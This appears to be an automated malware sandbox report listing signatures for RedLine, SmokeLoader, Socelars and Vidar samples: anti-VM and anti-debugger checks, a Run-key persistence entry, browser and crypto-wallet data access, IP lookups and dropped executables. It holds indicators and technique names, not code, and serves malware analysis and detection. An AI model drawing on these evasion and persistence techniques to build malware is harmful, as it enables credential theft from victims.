| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Socelars
Suspicious use of NtCreateProcessExOtherParentProcess
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\NQcQzWXtpEGKMyTl5AoE7i7S.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\dFccDEsRk7gTNKAD1oSb2EAT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\pwyIFxlcMhdwsR3wLrcsfQXl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\Qnqphm6SOYhH73CSsJ4bFUPP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\uIVM5UX3s2Mhr_WMWbjqOR4I.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\pwyIFxlcMhdwsR3wLrcsfQXl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\uIVM5UX3s2Mhr_WMWbjqOR4I.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\NQcQzWXtpEGKMyTl5AoE7i7S.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\Oe88DJ3T4iLGbzGvVo7dJ4a5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\MkQEUdYdZt91PK1nMLyyiXOT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\dFccDEsRk7gTNKAD1oSb2EAT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\Oe88DJ3T4iLGbzGvVo7dJ4a5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\MkQEUdYdZt91PK1nMLyyiXOT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\lMRrZ8za0XNxp4HVQbeIHCR5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\lMRrZ8za0XNxp4HVQbeIHCR5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\Qnqphm6SOYhH73CSsJ4bFUPP.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\NQcQzWXtpEGKMyTl5AoE7i7S.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\MkQEUdYdZt91PK1nMLyyiXOT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\Qnqphm6SOYhH73CSsJ4bFUPP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\uIVM5UX3s2Mhr_WMWbjqOR4I.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\Oe88DJ3T4iLGbzGvVo7dJ4a5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\dFccDEsRk7gTNKAD1oSb2EAT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\pwyIFxlcMhdwsR3wLrcsfQXl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\lMRrZ8za0XNxp4HVQbeIHCR5.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | geoiptool.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\uIVM5UX3s2Mhr_WMWbjqOR4I.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\NQcQzWXtpEGKMyTl5AoE7i7S.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\dFccDEsRk7gTNKAD1oSb2EAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\Oe88DJ3T4iLGbzGvVo7dJ4a5.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\MkQEUdYdZt91PK1nMLyyiXOT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\pwyIFxlcMhdwsR3wLrcsfQXl.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\Qnqphm6SOYhH73CSsJ4bFUPP.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\lMRrZ8za0XNxp4HVQbeIHCR5.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\d1cSuepKgtvUWoz3bgL2bjmy.exe | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Users\Admin\Documents\d1cSuepKgtvUWoz3bgL2bjmy.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe | C:\Users\Admin\AppData\Local\Temp\is-N12DA.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\libcueify.dll | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\d1cSuepKgtvUWoz3bgL2bjmy.exe | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\libass.dll | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-JTHTK.tmp | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\d1cSuepKgtvUWoz3bgL2bjmy.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\QtProfiler.exe | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-62Q93.tmp | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-CS31B.tmp | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\d1cSuepKgtvUWoz3bgL2bjmy.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-D2QJE.tmp | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\nccW3LP_L5VPMq0je0USgUGw.exe | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\javaw.exe | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-IGLE6.tmp | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
